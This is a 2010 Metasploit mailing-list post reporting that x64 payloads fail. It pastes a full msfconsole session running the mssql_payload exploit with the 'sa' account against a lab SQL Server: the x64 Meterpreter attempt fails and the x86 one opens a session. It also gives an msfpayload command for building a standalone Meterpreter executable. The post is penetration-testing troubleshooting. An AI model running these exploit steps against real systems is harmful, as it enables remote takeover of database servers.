Metasploit mailing list archives
Issues with x64 based payloads
From: David Kennedy <kennedyd013 () gmail com>
Date: Sat, 19 Jun 2010 23:37:43 -0400
Anyone experiencing issues when using mssql_payload via a x64 based system? It worked fine about two weeks ago however it appears something may have changed. Example below tested on a server 2008 x64: root@bt:/pentest/exploits/framework3# msfconsole 888 888 d8b888 888 888 Y8P888 888 888 888 88888b.d88b. .d88b. 888888 8888b. .d8888b 88888b. 888 .d88b. 888888888 888 "888 "88bd8P Y8b888 "88b88K 888 "88b888d88""88b888888 888 888 88888888888888 .d888888"Y8888b.888 888888888 888888888 888 888 888Y8b. Y88b. 888 888 X88888 d88P888Y88..88P888Y88b. 888 888 888 "Y8888 "Y888"Y888888 88888P'88888P" 888 "Y88P" 888 "Y888 888 888 888 =[ metasploit v3.4.1-dev [core:3.4 api:1.0] + -- --=[ 566 exploits - 274 auxiliary + -- --=[ 209 payloads - 26 encoders - 8 nops =[ svn r9563 updated today (2010.06.19) msf > use windows/mssql/mssql_payload msf exploit(mssql_payload) > set rhost 172.16.32.217 rhost => 172.16.32.217 msf exploit(mssql_payload) > set payload windows/x64/meterpreter/bind_tcp payload => windows/x64/meterpreter/bind_tcp msf exploit(mssql_payload) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- PASSWORD no The password for the specified username RHOST 172.16.32.217 yes The target address RPORT 1433 yes The target port USERNAME sa no The username to authenticate as UseCmdStager true no Wait for user input before returning from exploit VERBOSE false no Enable verbose output Payload options (windows/x64/meterpreter/bind_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique: seh, thread, process LPORT 4444 yes The listen port RHOST 172.16.32.217 no The target address Exploit target: Id Name -- ---- 0 Automatic msf exploit(mssql_payload) > set password P@55w0rd password => P@55w0rd expmsf exploit(mssql_payload) > exploit [*] Started bind handler [*] Command Stager progress - 2.80% done (1499/53629 bytes) [*] Command Stager progress - 5.59% done (2998/53629 bytes) [*] Command Stager progress - 8.39% done (4497/53629 bytes) [*] Command Stager progress - 11.18% done (5996/53629 bytes) [*] Command Stager progress - 13.98% done (7495/53629 bytes) [*] Command Stager progress - 16.77% done (8994/53629 bytes) [*] Command Stager progress - 19.57% done (10493/53629 bytes) [*] Command Stager progress - 22.36% done (11992/53629 bytes) [*] Command Stager progress - 25.16% done (13491/53629 bytes) [*] Command Stager progress - 27.95% done (14990/53629 bytes) [*] Command Stager progress - 30.75% done (16489/53629 bytes) [*] Command Stager progress - 33.54% done (17988/53629 bytes) [*] Command Stager progress - 36.34% done (19487/53629 bytes) [*] Command Stager progress - 39.13% done (20986/53629 bytes) [*] Command Stager progress - 41.93% done (22485/53629 bytes) [*] Command Stager progress - 44.72% done (23984/53629 bytes) [*] Command Stager progress - 47.52% done (25483/53629 bytes) [*] Command Stager progress - 50.31% done (26982/53629 bytes) [*] Command Stager progress - 53.11% done (28481/53629 bytes) [*] Command Stager progress - 55.90% done (29980/53629 bytes) [*] Command Stager progress - 58.70% done (31479/53629 bytes) [*] Command Stager progress - 61.49% done (32978/53629 bytes) [*] Command Stager progress - 64.29% done (34477/53629 bytes) [*] Command Stager progress - 67.08% done (35976/53629 bytes) [*] Command Stager progress - 69.88% done (37475/53629 bytes) [*] Command Stager progress - 72.67% done (38974/53629 bytes) [*] Command Stager progress - 75.47% done (40473/53629 bytes) [*] Command Stager progress - 78.26% done (41972/53629 bytes) [*] Command Stager progress - 81.06% done (43471/53629 bytes) [*] Command Stager progress - 83.85% done (44970/53629 bytes) [*] Command Stager progress - 86.65% done (46469/53629 bytes) [*] Command Stager progress - 89.44% done (47968/53629 bytes) [*] Command Stager progress - 92.24% done (49467/53629 bytes) [*] Command Stager progress - 95.03% done (50966/53629 bytes) [*] Command Stager progress - 97.73% done (52410/53629 bytes) [*] Command Stager progress - 100.00% done (53629/53629 bytes) [*] Exploit completed, but no session was created. msf exploit(mssql_payload) > set payload windows/meterpreter/bind_tcp payload => windows/meterpreter/bind_tcp msf exploit(mssql_payload) > exploit [*] Started bind handler [*] Command Stager progress - 2.80% done (1499/53629 bytes) [*] Command Stager progress - 5.59% done (2998/53629 bytes) [*] Command Stager progress - 8.39% done (4497/53629 bytes) [*] Command Stager progress - 11.18% done (5996/53629 bytes) [*] Command Stager progress - 13.98% done (7495/53629 bytes) [*] Command Stager progress - 16.77% done (8994/53629 bytes) [*] Command Stager progress - 19.57% done (10493/53629 bytes) [*] Command Stager progress - 22.36% done (11992/53629 bytes) [*] Command Stager progress - 25.16% done (13491/53629 bytes) [*] Command Stager progress - 27.95% done (14990/53629 bytes) [*] Command Stager progress - 30.75% done (16489/53629 bytes) [*] Command Stager progress - 33.54% done (17988/53629 bytes) [*] Command Stager progress - 36.34% done (19487/53629 bytes) [*] Command Stager progress - 39.13% done (20986/53629 bytes) [*] Command Stager progress - 41.93% done (22485/53629 bytes) [*] Command Stager progress - 44.72% done (23984/53629 bytes) [*] Command Stager progress - 47.52% done (25483/53629 bytes) [*] Command Stager progress - 50.31% done (26982/53629 bytes) [*] Command Stager progress - 53.11% done (28481/53629 bytes) [*] Command Stager progress - 55.90% done (29980/53629 bytes) [*] Command Stager progress - 58.70% done (31479/53629 bytes) [*] Command Stager progress - 61.49% done (32978/53629 bytes) [*] Command Stager progress - 64.29% done (34477/53629 bytes) [*] Command Stager progress - 67.08% done (35976/53629 bytes) [*] Command Stager progress - 69.88% done (37475/53629 bytes) [*] Command Stager progress - 72.67% done (38974/53629 bytes) [*] Command Stager progress - 75.47% done (40473/53629 bytes) [*] Command Stager progress - 78.26% done (41972/53629 bytes) [*] Command Stager progress - 81.06% done (43471/53629 bytes) [*] Command Stager progress - 83.85% done (44970/53629 bytes) [*] Command Stager progress - 86.65% done (46469/53629 bytes) [*] Command Stager progress - 89.44% done (47968/53629 bytes) [*] Command Stager progress - 92.24% done (49467/53629 bytes) [*] Command Stager progress - 95.03% done (50966/53629 bytes) [*] Command Stager progress - 97.73% done (52410/53629 bytes) [*] Sending stage (748032 bytes) to 172.16.32.217 [*] Command Stager progress - 100.00% done (53629/53629 bytes) [*] Meterpreter session 1 opened (172.16.32.129:52110 -> 172.16.32.217:4444) at 2010-06-19 23:30:05 -0400 meterpreter > Interesting enough if you just do a msfpayload windows/x64/meterpreter/bind_tcp LPORT=443 X > moo.exe and copy it over to the system it works. Thanks! Dave
_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- Issues with x64 based payloads David Kennedy (Jun 19)
- Re: Issues with x64 based payloads Joshua J. Drake (Jun 20)
- Re: Issues with x64 based payloads David Kennedy (Jun 20)
- Re: Issues with x64 based payloads Joshua J. Drake (Jun 20)